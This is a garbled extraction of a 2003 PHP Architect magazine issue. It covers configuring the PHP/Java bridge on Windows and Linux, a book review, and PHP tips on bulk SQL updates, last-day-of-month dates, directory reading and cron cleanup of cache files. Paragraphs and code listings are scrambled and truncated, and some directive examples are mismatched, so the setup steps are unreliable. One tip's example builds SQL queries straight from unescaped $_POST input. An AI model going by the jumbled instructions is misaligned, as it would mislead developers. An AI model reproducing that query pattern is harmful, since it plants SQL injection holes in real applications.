Each contains the same files (with some differences that are beyond the scope of this article). For the sake of this article, we’ll be dealing with the “Classic” location. In this folder you’ll notice this file: jvm.dll
This is the actual JVM (Java Virtual Machine) object that does all of the heavy lifting when you execute a Java program. The Class Path Now, one more topic that needs to be addressed before we get into the actual configuration is the class path. This is probably the most confusing and frustrating aspect of Java development. But once you have a firm grasp on the class path and the ramifications of establishing a class path, the more comfortable you will feel with Java. Java is a runtime language, meaning its dependent classes and libraries are “loaded” at runtime. Because of Java’s runtime nature, making sure Java knows where to find important things like classes, resources and properties files can be a bit daunting. Java uses the class path to find classes, resources, and properties. Because of the flexibility of the JVM, the class path can be defined in a number of different ways. The class path is often defined as an environmental variable that the JVM and Java compiler can read at runtime. The Java compiler needs to be aware of the class path because if the program you are compiling has external dependencies (such as a 3rd party JAR file), then the Java compiler needs to know where this JAR file is so it can compile your source. With Java, this loose coupling is used just so that the compiler can be aware of the data types, method signatures, and other runtime-oriented properties of your dependencies. Another method – one which I tend to prefer – is to define the class path as an argument when calling the Java compiler or JVM. Here’s a simple example of setting up a class path: javac -classpath c:\path\to\file.jar MySourceCode.java
September 2003
●
PHP Architect
●
www.phparch.com
62
FEATURES
Installing Java for PHP
What this command essentially says is that we want to compile (note the use of javac) the source code contained in MySourceCode.java. We also specify a –classpath switch, this is what tells the compiler that we have dependant “things” stored in “file.jar.”
being the case, my java.class.path looks a little like this:
Configuring PHP Okay, on to our PHP configuration. The first thing we want to do is open up the php.ini file in your text editor of choice. PHP/Java integration is done through an extension that is shipped with all new versions of PHP for Windows. Just to confirm you have the extension, navigate to:
As we start adding our own custom Java classes, we’ll need to append to the java.class.path directive the locations of our JAR files or paths to where our class files live. To append to the java.class.path, simply add a semi-colon (;) and add the full path to where your dependency lives:
C:\[php installation]\extensions
and make sure you have the php_java.dll file in this directory. Scroll down in your php.ini file and find the extensions section. You’ll notice this line: ;extension=php_java.dll
Go ahead and uncomment this line (remove the ‘;’ from in front of the word “extension”). So you should now have something like this: extension=php_java.dll
Next, scroll down to the Java section in the php.ini file. You’ll notice there are four directives for Java’s configuration: java.class.path java.home java.library java.library.path
Each of these directives need to be configured correctly or PHP will not know how to invoke any of your Java classes. We’ll just take them in order, one-by-one. java.class.path is the directive that tells the JVM what our dependencies are. There is one required dependency that MUST be specified here, and that is the php_java.jar file that came with PHP. If you do not have this JAR file in the java.class.path then Java integration will not work. So, my php_java.jar file is in my ‘extensions’ directory under my PHP install directory. With that
Don’t be afraid if the class path starts getting long, it happens. Moving right along to java.home, this directive lets PHP know where your JDK is installed (or JRE – the JDK is the JRE but with all of the developer tools). Using the example above (when installing the JDK) we’ll see the java.home directive as such: java.library=c:\jdk1.3\jre\bin\Classic\jvm.dll
That was pretty easy, eh? Next up is the java.library directive. Here’s where it starts getting interesting. The PHP/Java extension simply provides “hooks” so that the PHP engine can utilize the JVM, but in order for the extension to do its job completely we need to tell PHP where the JVM lives. Now, this confuses a lot of folks in that they think that just pointing this to the java.exe is what needs to be done, but the java.exe is really nothing more than a wrapper for the JVM and therefore is not the correct choice. What we need to do here is point this directive at the JVM DLL I mentioned earlier. If, for any reason, your machine refuses to play nicely with this JVM, try changing the “Classic” to either “Server” or “HotSpot.” The last directive is the java.library.path, which I have a problem with. First, it seems redundant to me, but I can see some of the logic behind this. The name itself is a bit meaningless to those not embroiled in the deep ether-world of Java development. Essentially this directive lets PHP know where the php_java.dll lives so that it can be fed to the JVM in the form of a -D (Directive) switch. I won’t go into the nitty-gritty details regarding JNI, but this setting causes a great deal of confusion, while it’s really quite simple. Just
63
FEATURES
Installing Java for PHP Now, you’ll need to execute this by doing something like this:
Listing 1 1 2 3 4 5
currentTimeMillis(); echo “The current time in milliseconds since epoch is: “. currentTime;
6 7 ?>
point this directive to the LOCATION of where the php_java.dll lives: java.library.path=c:\[php install]\extensions
There, everything should be set! If you are running Apache, give her a restart (so that the Apache module can be reloaded, thus reloading your changes in the php.ini). You’ll also need to restart IIS (if that is what you are using). Next step is to test out our configuration with a simple test script, shown in Listing 1. You should see output like: The current time in milliseconds since epoch is: 1054742366703
You will then be stepped through the process of unpacking the JDK components (and asked to sign away your life via the license agreement). You will then be left with a directory (in the place you executed this script) with a name like: jdk1.3.1_07 Now, su to root and create a directory in a common place, I generally like: /usr/java1.3 Of course you can do what suits you, but, for this article, I will do as I please. You can follow along as my minion, simply asking how high when I command ye to jump! Once you have your directory created, copy the contents (recursively) to this new directory. There, that’s it. Java is now installed. You may want to export your PATH variable to include: /usr/java1.3/bin or not, it’s completely up to you. Before going on, let’s just test out our installation to make sure everything is okay. First, cd to the ‘bin’ directory: cd /usr/java1.3/bin
If you see anything else, such as an error, then chances are there is something wrong with your configuration. I would highly recommend doublechecking the locations of the java.home, java.library and java.libray.path. Linux Configuration If you do a simple Google search on configuring Java integration with PHP on the Linux platform, you will be inundated with page after page of results, all pointing to tiny tidbits of information you need in order to get this darn thing to work! What I have (hopefully) done here is consolidated this information into one place where you can (again, hopefully) get up and running (relatively) quickly. The first thing you’ll need is a Linux version of the Sun Java JDK (Java Development Kit). Go to http://java.sun.com/j2se/1.3/download.html and select either the RPM or self-extracting version of the JDK. I prefer the self-extracting script. For the sake of this article, I’m going to assume you downloaded this version. Once the download is complete, you need to chmod 777 the file you downloaded:
Then type this command: java -version
You should see something like this: java version “1.3.1_07” Java(TM) 2 Runtime Environment, Standard Edition (build 1.3.1_06-b01) Java HotSpot(TM) Client VM (build 1.3.1_06-b01, mixed mode)
If you see something else, like an error, then your libc libraries or other system libraries may be out of date. Now that we have confirmed that Java is installed, indulge me for a moment while I explain some important files you’ll find in your JDK. In the ‘bin’ directory you’ll notice these three files: java javac jar
chmod 777 j2sdk-1_3_1_07-linux-i586.bin
• java – this is the executable file that September 2003
●
PHP Architect
●
www.phparch.com
64
FEATURES
Installing Java for PHP
invokes the JVM (Java Virtual Machine) and executes your class file (translates your byte code into machine code). • javac – this is the Java compiler. You need this to compile Java source code into Java class files (byte code). • jar – this is Java’s archive and packaging tool. A JAR file is nothing more than a ZIP file, but has special significance for Java in that classes can be packaged into a single file and the Java compiler (javac) and the Java executor (java) can read the contents of JAR files. One more location, let’s take a look at the actual JVM objects. cd /usr/java1.3/jre/lib/i386/classic
You’ll notice this file: libjvm.so This is the actual shared object file that contains the JVM. There are other “flavors” of the JVM, located in the ‘i386’ directory, but we’ll just pay attention to the “classic” flavor for now. With the dime tour complete, we can now get on with configuring PHP. First, I must say I am using RedHat 8.0 and because I like things they way I like them, I have my own installations (meaning I don’t use the default RPM installations) of PHP, Apache and damn near everything else. So, the locations I refer to may not be applicable to your system. First, we need to make sure we compiled PHP to include Java support. I know just how much pure joy it is to re-configure then re-make PHP, which is why I always create a “configure” script that contains all of my configure directives. You’ll need to make sure you included: —with-java=/usr/java1.3
Run configure (remember to rm –rf config.cache), then do: make make install
Once PHP has been successfully recompiled and re-installed, we can then do the actual configuration. Before going on, I must warn you, my dear reader, that there are some things that won’t make sense, but please, just do them, and don’t ask questions. You’ll be better off. Trust me. The first thing we need to do is make sure our
September 2003
●
PHP Architect
●
www.phparch.com
java.so extension (this is the extension PHP will load) is in our extensions directory. So, ‘cd’ to your extensions directory (specified in your php.ini) file. You should see: java.so If you do, good. Now, here’s some weirdness I have found. We must rename this file to: libphp_java.so
For some reason, PHP wants this extension to have that name. Because PHP is our friend, we try to make its life easier. Next, go back to your PHP source directory and cd into the ext/java directory. Copy the php_java.jar file to some place logical. I generally like to copy this into my extensions directory, just for the sake of consistency. This is a JAR file containing all of the required classes to create the PHP-to-Java bridge. Now that all of our files are in place, we can then make the required changes to our php.ini. So, without getting into a religious discussion, open your favorite editor, mine being vi, and locate the ‘extension’ section. You’ll want to make sure you have an uncommented line just like this: extension=libphp_java.so
The next thing we need to do is modify our Java section in php.ini. So, scroll down till you find Java and you will notice four directives: java.class.path java.home java.library.path java.library
java.class.path enables us to specify Java’s class path as a directive. I would recommend seeing the section entitled “The Class Path” in the Windows install notes, above, but in essence, Java’s class path enables us to specify the locations of dependent libraries and classes. Locations can either be an actual path or a JAR file. In our case, we just need to make sure that the php_java.jar file is specified in our java.class.path directive. We need to make sure the entire path is specified here. Your java.class.path should look something like: java.class.path=/usr/lib/php/20020429/ php_java.jar
65
FEATURES
Installing Java for PHP
As we get more into deploying our own Java classes, we’ll have to append to our class path directive. In many full blown Java applications, the class path can get amazingly long. That’s okay, though, as the class path provides us with a great deal of flexibility. Let’s get back to our other php.ini directives. java.home simply enables us to specify the location of our JDK, like so:
your configuration settings. 99.999% of the problems I see all go back to the configuration of PHP. NOTE: If you receive something like the following error: Fatal error: Unable to load Java Library /usr/local/jdk1.3.1_07/jre/lib/i386/classic/ libjvm.so, error: /usr/local/jdk1.3.1_07/jre/lib/i386/classic/ libjvm.so: undefined symbol: jdk_sem_post in /usr/local/httpd/htdocs/ phpjava.php on line 4
java.home=/usr/java1.3
Of course if your JDK installation is some where else, then by all means, specify that location here. java.library.path has provided me with a great deal of angst and frustration, especially in my first forays into Java/PHP configuration. I found so many permutations of what this should look like, that trying nearly all of them only resulted in repeated mistakes and thoughts of flinging myself out of the nearest window. What this directive requires is that we specify the location of our libphp_java.so object. For some reason (and I’m sure there’s a good one) the extension directory directive isn’t suitable for this, so we must specify something like this: java.library.path=/usr/local/php4/lib/ php/20020429
Now, the last directive, java.library, requires us to specify the JVM we wish to use. If you remember, we are using the “classic” JVM located in: /usr/java1.3/jre/lib/i386/classic. So, this directive will look something like:
try the installation again, this time setting your JVM to another type (server or hotspot).
Doing Something Interesting Okay, let’s do something interesting with our newfound skill and write a quick little Java class that we’ll then call from a PHP script. If you are using the Eclipse IDE (I can’t recommend this enough – http://www.eclipse.org), create a new Java project, then add a new Java Class (shown in Listing 2) to that project. If you are just using a standard text editor or some other IDE that doesn’t directly support Java, then you’ll need to use the JDK command line tools in order to compile. Eclipse has compile functions built-in to make life better. For those with Eclipse, just saving this source file compiles it. For those who aren’t using Eclipse, pop open a command prompt and navigate to where you saved this source file. Note that you should always save Java source code with a .java extension. It must be the same name (case sensitive) as your class. You’ll want to enter this command to compile your source code:
Wow, that should be it! Now give your php.ini a :wq (in vi) and bounce Apache and you should be all set. Now, now, you know I wouldn’t just leave you hanging. Let’s try her out, and make sure everything is hunky-dory. Next step is to test out our configuration with a simple test script, shown in Listing 1. You should see output like: The current time in milliseconds since epoch is: 1054742366703
If you get an error, it’s most likely a configuration problem. So double check your file locations and
September 2003
●
PHP Architect
●
www.phparch.com
C:\>javac HelloUniverse.java
or shell$>javac HelloUniverse.java
Listing 2 1 2 3 4 5 6 }
public class HelloUniverse { public HelloUniverse() {} public String saySomething (String message) { return “I was told to tell you: “ + message; }
66
FEATURES
Installing Java for PHP
You should, assuming you don’t have any syntax errors, have a HelloUniverse.class file. Now that you have successfully compiled this small little program, we need to append to our java.class.path directive in the php.ini file. This will tell the PHP engine where this class file lives. You should have something like the following: java.class.path=c:\[php install]\extensions\php_java.jar;c:\ mystuff\java
Listing 3 1 saySomething(“Look I got this to work!”); 4 echo $output; 5 ?>
resented by the $java object, we can then call methods in our class. This line:
or $output = $java->saySomething(“Look I got this to work!”); java.class.path=/[php install]/extensions/php_java.jar:/ home/me/mystuff/java
It’s important to note that the “mystuff\java” directory is where the HelloUniverse.class file lives. We do NOT actually specify the name of the class on our class path. The only time we specify a specific file name on the class path is when we are telling the JVM that our classes live in a JAR file. So, with this change made to our php.ini file, we need to restart our Web server (if you are doing this through the Web). Next, lets hack up a quick PHP script (Listing 3) that can use this class we just created. You’ll notice the first line creates an instance of our Java class. Notice how we just pass in the name of the class? When folks come to me wondering why they get “NoClassDefFound” exceptions, I often see that the full file name of the class was specified, like “HelloUniverse.class”. In the land of Java, the period (.) is rather significant, as this is how you specify a hierarchy of classes. Many full blown Java applications comprise lots of classes and interfaces, and instead of just lumping everything into one space, Java developers will break up the source code and create a logical hierarchal structure using sub directories. The class names then start to take on names like:
basically calls the saySomething() method (that is defined in our HelloUniverse class) and passes in a single string. You’ll remember the method definition in our HelloUniverse class accepts a single string as a parameter. We then assign the output of this class to a new variable: $output. The saySomething() method’s return type was that of a string, so we can then just echo or print the result of our call. That’s pretty much it. With this knowledge in hand you should be able to successfully use all of the facilities and features that Java provides within your PHP application. With this functionality, a whole new world of possibilities are just waiting to be explored. The sheer number of Java-based applications, APIs, services and utilities are truly stunning, and now, with this simple primer, you can start integrating these goodies into your own applications. As you may have read in my last article, I used PHP to integrate the Lucene search engine, which saved me an enormous amount of time in that I did not have to worry about implementing my own search engine. Using some basic Java programming skills and then integrating a single class, I have a full fledged searching and indexing system in my PHP application. So, repeat after me, “Java is my friend. It likes me. It doesn’t want to see me crying uncontrollably under my desk.”
About the Author Meaning, the class “MysqlConnectionPoolDataSource” lives in the directory: com/mysql/jdbc/jdbc2/optional
Once we have our instance variable, which is rep-
September 2003
●
PHP Architect
●
www.phparch.com
?>
Dave is a professional geek specializing in java/j2ee, php (naturally), and perl development which is just a cover for his real passion for spending large sums of money on home recording and musical equipment and generally making a nuisance of himself. it should also be noted that his /. karma is currently "positive" which will surely fall.
Click HERE To Discuss This Article http://forums.phparch.com/49 67
B O O K
R E V I E W
Core PHP Programming 3rd Edition Leon Atkinson with Zeev Suraski 1104 pages Prentice Hall PTR
C
ore PHP Programming is the book that started it all. The first edition was the first English PHP book to market. Now in its third edition, Core PHP Programming continues to be a pioneer in the PHP world by jumping the gun and offering a full PHP5-compliant reference. Weighing in at over 1000 pages, it features an introduction to PHP, a large function reference, as well as information on PHP design patterns, algorithms, and common tasks. It boasts over 650 downloadable code examples and was coauthored by Zeev Suraski, co-creator of the Zend Engine (1 and 2) that drives PHP. Because of other PHP books I'd read, I was a little skeptical as I first leafed through this one. I figured the function reference would be months out of date, and be a regurgitation of the http://php.net reference. I thought the other material would be cursory and uninspired. I just didn’t think there would be much value in a book like this (I don’t normally do book reviews). I was wrong, very wrong. The function reference provided in the book is actually more complete than the http://php.net reference. For example, I found functions like debug_zval_dump() and output_add_rewrite_var() in the book that aren’t even documented on the web site. Doing a search on http://php.net only showed them appearing in recent PHP4 changelogs! The introduction to PHP at the beginning of the book was excellent. It stepped though the different areas of programming with PHP, offering excellent explanations and loads of examples. This introduction should bring the beginner up to speed quickly, and even taught this experienced developer a few semantics. September 2003
●
PHP Architect
●
www.phparch.com
Since the book is fully updated for PHP5, it contains a large amount of information on the new object features offered. Sporting the same clarity and rich examples as the rest of the book, this section is a must-read. On another note, it’s nice to see the author not attempt to delve into objectoriented theory. Many language books attempt to do this, and in most cases its usually incomplete enough to be distracting. The last few chapters of the book contain solutions to common tasks and design considerations, all supplemented by a wealth of code examples. One particularly interesting chapter explains and demonstrates some common design patterns using the new PHP5 features. Although this book is very well written, it is an early adopter book, which means that there are a few inconsistencies. The most notable of these is that although namespaces were dropped from PHP5, the book does contain a namespace section in the objects and classes chapter. My only other major complaint is that there isn’t any version information in the function reference. The book was written for PHP5, but excluding version information makes the book significantly less useful for those using older versions. All in all, this is a great book! Beginners will find the introduction to PHP extremely well-written, and the annotated function reference very helpful; intermediate developers will find the function reference, algorithm, and design sections very useful; expert developers could pick a worse book to carry with them as an offline reference (although it is a bit bulky). php|a
68
T I P S
&
T R I C K S
Tips & Tricks By John W. Holmes
Setting a Status with Radio Buttons In most projects you come to a section where you want to present a list of items to your users and allow them to easily set some kind of status for each item. Say, for example, you’re displaying a listing of jobs to an administrator of a job site. You want to easily allow them to mark a job as Pending, Open, Closed, or Deleted. A straightforward approach would be to use drop down boxes with each status option. If you have a larger number of options, this is probably your best bet, anyhow, and would be rather easy to deal with. However, with a small number of options like those presented, a nice way to present them is by using HTML radio inputs.
The first issue you’ll notice, though, is that we need a way to tie each option to the specific job. That means that all four radio inputs must have the same name for each individual job so that only one status can be chosen per job. You could name each radio input as “status1” for one job, “status2” for the next, etc, but then it
September 2003
●
PHP Architect
●
www.phparch.com
is not related to the actual job at all. You’ll have to provide extra code or logic to tie the two together. You could also name each set of four radio inputs as “status_XX” where XX is the unique job_id for the job. This means you’ll have to use some variable (http://us2.php.net/manual/en/ language.variables.variable.php) trickery to get things to work on the processing side, though. I’m sure variable variables have their place, but in my opinion, you’re just avoiding using an array when you use them. So, let’s use an array. I have discussed in previous columns how you can turn any input element into an array by adding brackets to the name. name=”status[]”, for example, will create a zero based array upon submission, name=”status[main][]” will create a multi-dimensional array upon submission, etc. We’re going to create a one-dimensional array to accomplish our needs, where the “key” to the array is the job_id and the “value” will be the status. An example of how this will look is shown in the first example of Listing 1. Each job will have a radio input with a unique name “status[XX]” where XX is the job_id. Now only one status can be chosen for each job. That part was hopefully easy to follow and hopefully was something you’ve already seen. What we need now is an easy method to process the changes for each job. The straightforward approach, again, would be to just cycle through each status and issue an UPDATE query for each job. This method is shown in the first example in Listing 1. Depending on how many jobs you have
69
Tips & Tricks per page, though, you may be running a dozen or more queries, one for each job. So a way to do this with a single query would be optimal. We can accomplish this by working some CASE logic into our query. Each database should have an implementation of CASE, although the syntax may vary some from database to database. What we want to accomplish is to make a series of CASE conditions for each status that is chosen. The second example in Listing 1 shows how we can accomplish this. First, we re-arrange the statuses passed into a multi-dimensional array called $data. The first key of $data will be the “status” of Pending, Open, etc, and then an element is added to this “status” array containing the value of the job_id. We end up with an array such as this, Array( ‘pending’ => Array( 0 => 1234, 1 => 1235), ‘closed’ => Array( 0 => 1236, 1 => 1237), …
where 1234 – 1237 are the job_id numbers. We can now cycle through this array and create our SQL statement. The basic syntax of the CASE is going to be status_column = CASE WHEN job_id IN (XX) THEN ‘status’ CASE WHEN job_id IN (XX) THEN ‘status’ CASE 1 THEN status_column END
This is going to work just like a switch() in PHP. When the job_id matches one of the ID numbers in XX, then the value ‘status’ is supplied for that row. The final CASE is like the default: conListing 1 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23
$status) { $query = “UPDATE jobs SET status = ‘$status’ WHERE job_id = $job_id”; $rs = mysql_query($query); } //Example 2 (Single UPDATE with CASE) foreach($_POST[‘status’] as $id => $status) { $data[$status][] = $id; } $query = “UPDATE jobs SET status = CASE “; foreach($data as $status => $ar) { $id_list = implode(‘,’,$ar); $query .= “ WHEN id IN ($id_list) THEN ‘$status’ “; } $query .= “ WHEN 1 THEN status END “; $rs = mysql_query($query);
dition in a PHP switch(). If none of the other conditions are matched, then the status_column is set to itself, or, in other words, not changed. Now, if you’re always updating every row in your table with your query, the “default” case is not needed. However, since we usually show a portion of our data, either paged or matching some criteria, the default CASE is required so that the remainder of the table rows are not set to NULL. This may be dependent upon your databases implantation of CASE, but with MySQL and the syntax we are using, the status_column is set to NULL if no CASE is matched and the default CASE is not included. If you don’t account for this, you may end up wiping the status_column values from your table. Based on the array structure shown, we have a “pending” array full of job_id numbers that should be set to “pending”, a “closed” array full of job_id numbers that should be set to “closed”, etc. By cycling through this array, as shown in the second example of Listing 1, we can create our CASE logic by using implode() to create the list of ID numbers and grabbing the “key” from the data array to use as our “status”. After looping through the data, don’t forget to add the END to complete the CASE syntax. The end result of all this is a single query that’ll update the status of each job. Example 1 in Listing 2 is an example of what a query would look like that is updating 20 different jobs to four different status values. While we end up creating a more complex query, we’re only running one query instead of multiple queries. While everyone should do their own benchmarking, my tests showed the CASE method to be 4-5 times faster than running multiple queries (when updating 20 jobs at a time). An alternative to the “default” CASE, especially if your database implements this differently, is to create a WHERE condition that specifies all of the job_id numbers that should be updated. This way, the other rows in your table are left alone. The syntax for such a query is shown as the second example in Listing 2. I leave it up to you to find the easiest way to create that list (hint: array_keys($_POST[‘status’])). My benchmarks showed there was almost no difference in using the default CASE or the WHERE condition. Last Day of the Month Here’s a quick and simple tip for getting the last day of any month. The real trick is to actually
?>
September 2003
●
PHP Architect
●
www.phparch.com
70
TIPS & TRICKS Listing 2 #Example query UPDATE jobs SET status = CASE WHEN job_id WHEN job_id WHEN job_id WHEN job_id WHEN 1 THEN END
Listing 3 1 (default CASE)
IN (1,7,13,19) THEN ‘pending’ IN (2,6,8,12,14,18,20) THEN ‘open’ IN (3,5,9,11,15,17) THEN ‘closed’ IN (4,10,16) THEN ‘delete’ status
#Example query 2 (WHERE condition) UPDATE jobs SET status = CASE WHEN job_id IN (1,7,13,19) THEN ‘pending’ WHEN job_id IN (2,6,8,12,14,18,20) THEN ‘open’ WHEN job_id IN (3,5,9,11,15,17) THEN ‘closed’ WHEN job_id IN (4,10,16) THEN ‘delete’ END WHERE job_id IN (1,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20)
just ask for the “zero” day of the next month. The code in Listing 3 gives an example of how you do this. $lastdayofmonth is now a Unix timestamp for the last day of August, 2003 at 12:00pm. You can format that with date() or use any of the other date and time functions. Reading Directories PHP offers a couple of different ways to read directories and files from your local file system. The most common way is probably using opendir() and readdir(), as shown in the first example of Listing 4. You can specify the path to open with opendir(), and then with each call to readdir() the next file name is returned. For you object-oriented (OO) types, PHP also offers the built in dir class as shown in the second example. Simply create a new “dir” object by passing the path. With each call to this object’s read() method, the next file name is returned. Each method also provides a rewind() and close() function to reset the directory handle back to the first file, and close the handle, respectively. It is also worthwhile to note that the files are not returned in any particular order when reading them. They are usually returned in the same order as shown in an ls or dir command, but it’s dependent upon the system. For this reason, the files are normally dumped into an array as they are read so that one of the various array sorting functions can be used. A final method can be used to search for files matching a certain pattern. Since PHP 4.3.0, the glob() function will return an array of file names matching a pattern you specify. The pattern is the same type of pattern that you’d specify on the command line. So, say, for example, you have a directory full of images named September 2003
image1.gif, image2.gif, etc. You could use glob() with a pattern of “image*.gif” to retrieve an array of all the image file names. The final example of Listing 4 shows an example usage of glob(). The PHP manual page for glob() has some examples of turning glob() into a recursive function so you can also search subdirectories for files matching a given pattern. Combine any of the above methods with is_file() or is_dir(), for example, and you’ll be able to do many things with the file system. Using the Command Line to Clean Up Files Mike Migurski offers up this advice for using command line functions for things that may be difficult to do in PHP: Many PHP applications implement database caches or user sessions by storing persistent data in the filesystem — it’s a cheap way to emulate shared memory between requests, and can help make the most of limited system resources when many scripts are likely to need the results of expensive, though identical, database or remote server queries. This method does have a significant disadvantage: how does your application know when the information cached in the file system may be out date, and how can you be sure that you are not accidentally serving up stale data? Often, a problem that is difficult or inconvenient to solve using PHP can be approached using your operating system’s built-in tools, especially if you are running a variant of Unix. For example, if you have decided to cache frequently-requested SQL query results by storing
71
TIPS & TRICKS files in /tmp, you may want these files to be automatically flushed when they are older than a few hours. Instead of performing the up-todate checking in PHP, let ‘find’ handle it. The standard Unix ‘find’ program has a number of options that can narrow your search; ‘-cmin +120’ will match files created over 120 minutes ago, and ‘-type f’ will match only files, not directories or symbolic links. So, assuming that you have placed your query cache files in /tmp and named them all with ‘query_’ at the beginning, the following invocation of ‘find’ will return a list of all the files older than 2 hours: find /tmp -name ‘query_*’ -type f -cmin +120
If you want to automatically delete the files in the resulting list, try piping the output of ‘find’ into ‘xargs’, a program whose sole purpose is to construct argument lists for named utilities. The following will construct a list of old files, and pass it on to ‘rm’ for removal:
Finally, you will want to automatically run this command periodically, so that you don’t have to think about keeping your cache clean. Use the ‘cron’ program, which allows you to specify recurring commands and the times at which they will be run. The following entry in your crontab file will flush out your cache at the top of every hour, provided you have the necessary permissions to delete the cache files: 0 * * * * find /tmp -name ‘query_*’ -type f -cmin +120 -print0 | xargs -0 rm
(Each of the above commands should all be on one line.) Be Like Mike! You, too, can be like Mike and have your tip or trick published in php|architect. Send any suggestions you have to [email protected] to be considered for publication. About the Author
John Holmes is a Captain in the U.S. Army and a freelance PHP and MySQL programmer. He has been programming in PHP for over 4 years and loves every minute of it. He is currently serving at Ft. Gordon, Georgia as a Company Commander with his wife and two sons.
72
B I T S
&
P I E C E S
Bits & Pieces Real. Interesting. Stuff.
Mailinator On Techdirt (www.techdirt.com) a while back, a new free email service called Mailinator (www.mailinator.com) was mentioned. Mailinator is a free email system in every sense of the word: it doesn’t cost anything, there is no sign up, and there are no access controls. What? No access controls? That’s right, you can check [email protected], [email protected], or [email protected], all without logging in. Why do I care again? Because this offers a way to get around either giving away your hotmail address with the wellchosen, spam-free name to a questionable site just to get access to some resource. No more going through the signup process for another dummy hotmail account, just to receive a password for some site. Now you give your email address as [email protected], submit, and go check that account’s email. No restrictions, and you’ll probably change that password as soon as you get it, anyway. If you don’t, no worries – emails are deleted after a few hours. Sure, somebody else could be checking my mail... but who cares? Security and privacy are not always one and the same. Quote of the month Taken from a PHP help forum, in a thread about right and wrong OO practices: Person 1: “And then there’s the point from a little earlier about the reduced reusability due to the lack of orthogonality.” Person 2: “What has bird watching got to do with it?” September 2003
●
PHP Architect
●
www.phparch.com
Regular Expressions, Part 1 Everybody loves regular expressions, right? Wrong. Regular expressions can be a real pain in the ass if you’re just starting out. Questions like “It looks like it should work, but it doesn’t...”, or “How do I find URL’s in a document where the link text isn’t ‘XYZ’?” are all too common types of questions on mailing lists and forums. Enter “The Regex Coach”: http://www.weitz.de/regex-coach/ Here’s the abstract from the site: The Regex Coach is a graphical application for Linux and Windows which can be used to experiment with (Perl-compatible) regular expressions interactively. It has the following features: • It shows whether a regular expression matches a particular target string. •It can also show which parts of the target string correspond to captured register groups or to arbitrary parts of the regular expression. • It can “walk” through the target string one match at a time. • It can simulate Perl’s split and s/// (substitution) operators. • It tries to describe the regular expression in plain English. • It can show a graphical representation of the regular expression’s parse tree. • It can single-step through the matching
73
BITS & PIECES process as performed by the regex engine. • Everything happens in “real time”, i.e. as soon as you make a change somewhere in the application all other parts are instantly updated. Check out Figure 1 for a shot of what it looks like. Regular Expressions, Part 2 Although this is a magazine dedicated to PHP, sometimes tools available in other languages bear offer great potential for assisting your PHP coding. Besides, Perl is where PHP gets its regular expression syntax, anyway. In Part 1, we looked at a tool to help us see if a regular expression matches a string properly. In this part, I’d like to show you a Perl package called YAPE::Regex::Explain. This little guy provides a verbal explanation of what a given regex does. I was introduced to YAPE::Regex::Explain by Andy Hassall. He posted output from it on the comp.lang.php newsgroup in response to a regex question. In Table 1 (next page), I’ve included part of the post. Very cool, indeed. With the help of these two tools (The Regex Coach and YAPE::Regex:: Explain), you should be well on your way to becoming a regular expression master.
The Game Another interesting tidbit from the php|a forums. If you head over to www.phparch.com/discuss/viewtopic.php?t=253
you’ll see that “class_tranceaddict” has started a thread with an interesting concept. Remember that old game where somebody starts with a word, and each person in the room adds a word in turn, forming funny sentences? You can come up with some pretty crazy things, and you never know where it will lead. This forum thread started with: class munchies { }
“class_tranceaddict” says: Add a line to the following code, just one line, and personalize it, but make sure it doesn’t completely throw away the use of the code as you found it. Change slightly, but not drastically. All parts of the PHP language can be used. The idea is to create a little applet or class that does something in the end.
Figure 1
September 2003
●
PHP Architect
●
www.phparch.com
74
BITS & PIECES It will be interesting to see where it leads. The Interview Recently, on the php-general mailing list, there was a thread about how to separate the wheat from the chaff in a PHP job interview. Many suggestions were made, and some good ideas were presented. Jay Blanchard, for instance, offered up a puzzle as a way to see if the candidate can think. In one room you have 3 light switches, each connected to one light bulb in another room. How many trips must you make to each room to determine which switch is connected to which light bulb? Curt Zirzow offered the following solution to Jay’s puzzle: toggle_light(1); sleep(120); toggle_light(1); toggle_light(2); move(‘self’, ‘room/’); if ($lightbulb[‘temp’] > $room[‘temp’]) { echo “switch #1”; } elseif ($lightbulb[‘ison’]) { echo “switch #2”; } else { echo “switch #3”; }
And John Holmes (our very own Tips and Tricks columnist) offered up the following nugget, which is particularly funny if you follow the phpgeneral list: PHP is server side, so it obviously cannot control light bulbs. Use Javascript. It’s discussions like these that keep me following that high-volume list. Good work, all! PHP Compilers Like Mushrooms? You may remember a while back when our publisher Marco Tabini and John Coggeshall announced separately that they were working on proofs-of-concepts for a PHP compiler capable of turning PHP code into binary executables. Marco's compiler provided its own parser for the PHP source and produced an output that could be compiled with any ANSI-compatible C compiler. John's version, on the other hand, plugged directly into the Zend Engine to transform its opcodes into assembler. Now, a third project called BinaryPHP has been started; it converts PHP source into C++ code (presumably to take advantage of the latter's overloading features). Its development team has already completed a proof-of-concept, and is hard at work on its functionality. You can find BinaryPHP's homepage at http://binaryphp.sourceforge.net.
TABLE 1 The regular expression: (?-imsx:(?
NODE
EXPLANATION
(?-imsx:
group, but do not capture (case-sensitive) (with ^ and $ matching normally) (with . not matching \n) (matching whitespace and # normally):